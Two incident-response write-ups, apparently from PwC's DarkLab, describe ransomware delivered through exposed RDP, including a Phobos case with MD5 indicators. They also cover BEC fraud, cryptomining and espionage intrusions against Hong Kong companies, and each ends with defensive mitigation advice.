Once inside the victims’ network, we have seen criminals creating a local account with netplwiz, deploying a malicious network share scanner called 5-NS new.exe, and deleting event logs prior to executing the main payload.

Several hours after the initial intrusion threat actors triggered the ransomware in the form of a malicious executable. Other than encrypting the files, the ransomware also tampered with infected hosts to disable the firewall and other security configurations.

Conclusion

Attackers did not employ particularly sophisticated tradecraft and PwC was able to help clients contain the incidents quickly. Nonetheless, the intrusions impaired systems availability and created operational disruption among victim companies. This can be particularly damaging when most organisations’ staff connect remotely to the corporate network due to the COVID-19 pandemic.

Recommendations

To protect against ransomware incidents via RDP exploitation, DarkLab recommends companies to:

  • Ensure visibility over public-facing RDP servers via external scans
  • Limit exposure of public-facing systems whenever possible
  • Enforce use of multi-factor authentication for remote access, particularly RDP
  • Ensure your organisation has and follows an effective back-up policy
File NameMD5Description
20.09.2019Taskmgr.exeb8351ba02dbce02292a01a6e85112e2bPhobos ransomware
Mouse Lock_v22.exefc9c80e1767e1266056b1b2c89a74ce5Blocks mouse cursor on screen
5-NS new.exe597de376b1f80c06d501415dd973dcecNetwork shares scanner

Cyber threats to Hong Kong

An incident response perspective

In the last two years, DarkLab has helped clients respond to, and recover from, numerous network intrusions. Our clients span a variety of sectors in Hong Kong and Macau, including financial services, real estate, telecommunications, and aviation, among others. The organisations we helped also varied greatly in size and cyber security maturity. Some employed just a handful of personnel with no dedicated security function, while others were large international organisations with an established CISO and security teams.

This range of incident response experience means that DarkLab is in a unique position to identify cyber threats to Hong Kong companies across multiple sectors. In this article, we share some of the threat trends we have observed first hand, and highlight effective mitigation methods companies can implement to thwart them.

Common attacks against companies in Hong Kong

In 2018, we were called in to help investigate a significant number of business email compromise (BEC) frauds against financial services companies. BEC frauds see threat actors sending emails to employees, often in the finance department, to instruct them to direct funds to a bank account that scammers control. For the fraud to work, the email needs to appear to originate from an internal, trusted email account.

While email spoofing is the simplest option for threat actors, in most of the incidents we observed threat actors instead directly compromised an email account. This allowed them to monitor their victim’s incoming emails and hijack an email thread to grant their fraudulent request greater credibility. While BEC scammers usually spent no more than a couple of days in their victim’s accounts, we saw one incident where their presence remained undetected for almost a week.

In 2019, the most common type of attacks were ransomware and cryptomining. Cryptomining incidents were mostly caused by automated botnets. Intrusions were often detected promptly by victims due to the unusually high CPU usage required to generate cryptocurrency.

Ransomware attacks instead showed a higher degree of stealth and manual lateral movement. For instance, in a ransomware intrusion attackers operated in the infected network only outside standard office hours. By also exploiting living-off-the-land techniques intruders managed to remain unnoticed until the encryption routine was activated some 20 days later.

Threat intelligence suggests that last year ransomware and cryptomining threats were on the rise globally, showing how threats to Hong Kong closely follow global threat trends.

Main initial attack vectors exploited

The initial attack vectors for most incidents we investigated were abuse of internet-facing infrastructure, often exploiting brute-force attacks or stolen credentials to access servers with enabled remote desktop protocol (RDP) and secure shell (SSH).

For instance, a client in the shipping industry had ten servers infected by the Anacron cryptomining malware. Upon investigation, we discovered attempted bruteforce attacks against the same SSH server for almost a month, suggesting automated botnet activity. Once logged in, the malware spread to 10 additional servers that shared the same password as the infected web server.

Ransomware infections that initiated on a public-facing RDP server were also relatively common. For instance, we responded to one such incident involving the Dharma/Crysis ransomware that was affecting a real estate development company.

In at least one case, however, a publicly available exploit enabled a ransomware attack against a company in the professional services sector. Attackers exploited a known vulnerability in Windows IIS (CVE-2017-7269) to gain initial access to a server used for testing, which was left exposed to the internet. After stealing multiple IT user accounts with the highest privileges, the attacker compromised and encrypted 62 Windows servers causing significant business disruption.

Espionage intrusions against organisations in Hong Kong

Although less numerous, we also witnessed prolonged and organised network intrusions against companies in Hong Kong carried out by skilled threat actors.

In an incident in late 2019, we responded to a supply-chain compromise carried out by a likely espionage group against a Hong Kong client in the aviation sector. The attacker targeted a subsidiary of the client by exploiting an unpatched firewall vulnerability to obtain valid VPN credentials. Once inside the victim’s network, the threat actor conducted extensive reconnaissance and staged various tools on internal servers. Tools included the credential dumping Mimikatz, NBTScan for network scanning, and PSExec for lateral movement.

After more than a month in the subsidiary’s network, the threat actor exploited the trusted connection with the main organisation’s network to move across. Fortunately, the intrusion in the main organisation’s network was detected in time and it did not result in exfiltration of data. Nonetheless, we saw similar tactics, techniques and procedures used against another Hong Kong critical national infrastructure company in 2018. This suggests that espionage threat actors continue to pose a threat to Hong Kong organisations in strategic sectors.

Mitigations

Despite the range of potential threats to companies in Hong Kong, cyber security best practices and common hygiene methods can help deter a significant portion of the cyber attacks we observed.

To improve your organisation’s resilience to cyber attacks we suggest to:

  • Enforce the use of multi-factor authentication for remote access
  • Restrict domain admin rights
  • Limit exposure of public-facing systems
  • Ensure that best practices for network segmentation are observed
  • Conduct regular security awareness training for IT and non-IT staff
  • Perform regular cyber attack simulations to ensure resiliency
  • Consider establish or outsource a Security Operation Centre (SOC) for security log monitoring and threat hunting
  • Ingest timely Cyber Threat Intelligence feeds and reporting for proactive defense against upcoming threats